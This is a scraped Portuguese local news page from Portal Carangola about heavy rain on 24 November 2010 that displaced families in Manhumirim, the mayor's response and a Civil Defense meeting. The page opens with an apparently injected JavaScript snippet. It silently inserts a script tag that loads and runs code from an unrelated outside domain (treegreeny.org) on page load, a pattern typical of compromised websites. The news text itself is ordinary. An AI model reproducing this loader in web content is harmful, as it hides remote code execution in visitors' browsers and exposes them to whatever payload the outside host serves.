;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Chuva desaloja moradores em Manhumirim - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Chuva desaloja moradores em Manhumirim

A forte chuva que atingiu a cabeceira do Rio Jequitibá na madrugada de 24 de novembro de 2010, deixou várias famílias desalojadas no município de Manhumirim. O bairro mais atingido foi o Santa Rita, onde várias residências estão próximas da margem do rio. Muitas famílias deixaram suas casas por precaução, já que o grande volume de chuva fez o rio transbordar causando alagamento em algumas ruas, sem causar danos maiores.

Desde as primeiras horas do dia, o prefeito municipal Ronaldo Lopes Correa, esteve acompanhado tudo de perto, deixando a prefeitura de prontidão para o caso de necessidade. O prefeito também esteve dando entrevistas para a Rádio Manhumirim, que também acompanhou tudo. Em suas entrevistas, Ronaldo Lopes, procurou orientar e acalmar a população. O prefeito manteve contato direito com o renomado meteorologista Ruibran dos Reis, que participou ao vivo do programa “Voz do Executivo”, que vai ao ar as quartas – feiras pela Rádio Manhumirim Am. Na conversa com o prefeito, Ruibran, afirmou que a situação é tranqüila já que não há previsão de grande volume de chuva para os dias seguintes. Mas, alertou para as chuvas fortes que podem ocorrer em dezembro e janeiro.

Defesa Civil Municipal.

A Defesa Civil de Manhumirim, esteve reunida na tarde do dia 24 de novembro. A reunião, convocada pelo secretário de administração, Elísio Saqueto, já estava marcada desde o dia anterior, visando elaborar estratégias para uma ação mais eficaz em caso de necessidade.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim

Ofertas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.